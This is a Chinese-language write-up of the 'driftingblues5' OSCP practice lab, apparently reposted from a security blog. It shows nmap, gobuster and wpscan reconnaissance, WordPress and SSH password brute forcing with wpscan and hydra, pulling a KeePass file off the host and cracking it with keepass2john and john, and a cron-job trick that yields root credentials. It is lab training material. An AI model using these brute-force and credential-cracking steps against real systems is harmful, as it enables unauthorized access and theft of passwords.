【OSCP】driftingblues5

admin 2024年3月19日16:43:45评论9 views字数 2666阅读8分53秒阅读模式
【OSCP】driftingblues5

OSCP 靶场

【OSCP】driftingblues5

靶场介绍

driftingblues5

easy

wordpress、wpscan爆破、图片隐写、keepass2john工具使用、john爆破keyfile、keepass使用、任务计划分析排查、pspy64使用、linpeas使用、

信息收集

主机发现

nmap -sn 192.168.1.0/24

端口扫描

端口扫描只有两个端口ssh 和 WordPress 6.4.2

└─# nmap -sV -A -p- -T4 192.168.1.188
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-27 01:22 EST
Nmap scan report for 192.168.1.188
Host is up (0.0029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 6.4.2
|_http-title: diary – Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3D:A0:3A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

【OSCP】driftingblues5

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.188 -x php,txt,html -e

【OSCP】driftingblues5

http://192.168.1.188/wp-content/uploads/2021/02/

这里仔细一点会发现有一张图片是首页上没有展示出来的。先放着,稍后可能有用。

【OSCP】driftingblues5

【OSCP】driftingblues5

wpsan扫描

 wpscan --url http://192.168.1.188 
wpscan --url http://192.168.1.188 -eu

【OSCP】driftingblues5

这里使用wpscan 扫描出来网站的几个用户名,

【OSCP】driftingblues5

wpscan --url http://192.168.1.188 -U user.txt -P /usr/share/wordlists/rockyou.txt -t 50

【OSCP】driftingblues5

上面爆破的半天都没有,先尝试制作一个密码本来爆破,没有的话在使用上面的字典爆破

cewl -d 2 -m 4 -w passwd.txt --with-numbers http://192.168.1.188/index.php

【OSCP】driftingblues5

这里虽然登录成功了,但是没有管理员权限并不可以直接getshell

【OSCP】driftingblues5

使用账号密码尝试登录ssh 也是失败了,下面找重新爆破一下ssh服务了。

【OSCP】driftingblues5

hydra -L user.txt -P passwd.txt ssh://192.168.1.188 -t 20

这里也是爆破失败了。

【OSCP】driftingblues5

权限获取

常用的方法尝试失败后,查看图片居然还有隐写内容,直接发现密码

【OSCP】driftingblues5

接下来进行密码喷射,还是gill 账号的密码

【OSCP】driftingblues5

【OSCP】driftingblues5

权限提升

【OSCP】driftingblues5

【OSCP】driftingblues5

用户根目录下还有一个keyfile.kdbx文件,该文件是KeePass密码管理器安全创建的数据文件称为KDBX文件,.kdb是自己创建的密码库,里面可以添加保存一些你的账号密码,并且这个密码库也有自己的密码。更多了解可参考:https://www.cnblogs.com/stxs/p/8675123.html

我们先将该文件下载到本地,命令:

scp -rp [email protected]:/home/gill/keyfile.kdbx /tmp
或者使用
php -S 0.0.0.0:9999
python3 -m http.server
keepass工具下载:https://keepass.info/download.html

这里还需要密码

【OSCP】driftingblues5

利用keepass2john工具获取其hash值,然后进行爆破,命令如下

keepass2john keyfile.kdbx > hash

接着进行爆破,命令如下:

john --wordlist=/usr/share/wordlists/rockyou.txt hash

爆破成功获得密码为:porsiempre

【OSCP】driftingblues5

打开后,里面密码是隐藏了,我以为有root 的账号密码,还是想简单了。到这里思路还是断了。【OSCP】driftingblues5

查看任务计划,这里发现root 存在一个任务计划。但是没有权限查看,所以只能通过pspy64进行

cat /var/spool/cron/*

【OSCP】driftingblues5

【OSCP】driftingblues5

使用linpeas.sh 脚本还发现了这个文件夹。

【OSCP】driftingblues5

【OSCP】driftingblues5

这里看了网上的write-up,终于做出来。这里是需要我们在/keyfolder目录中创建新文件,并且文件名应该是我们刚刚找到的 keepas 中的名称。

原理是这个脚本将密码写入到了刚才keepass发现的几个标题那里去了,然后在/keyfolder目录下创建刚才的几个标题,但是没什么变化,后来就一个一个单独创建,在创建fracturedocean文件时,多出来一个rootcreds.txt文件,读取该文件获得root密码信息:imjustdrifting31。

【OSCP】driftingblues5

【OSCP】driftingblues5

最后可以看到key.sh 这个脚本就完全明白了。他是定期去脚本keyfolder 这个文件夹下是否有这个文件,如果有的话就写入密码。

【OSCP】driftingblues5

End

“点赞、在看与分享都是莫大的支持”

【OSCP】driftingblues5

【OSCP】driftingblues5

原文始发于微信公众号(贝雷帽SEC):【OSCP】driftingblues5

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月19日16:43:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】driftingblues5https://cn-sec.com/archives/2580514.html

发表评论

匿名网友 填写信息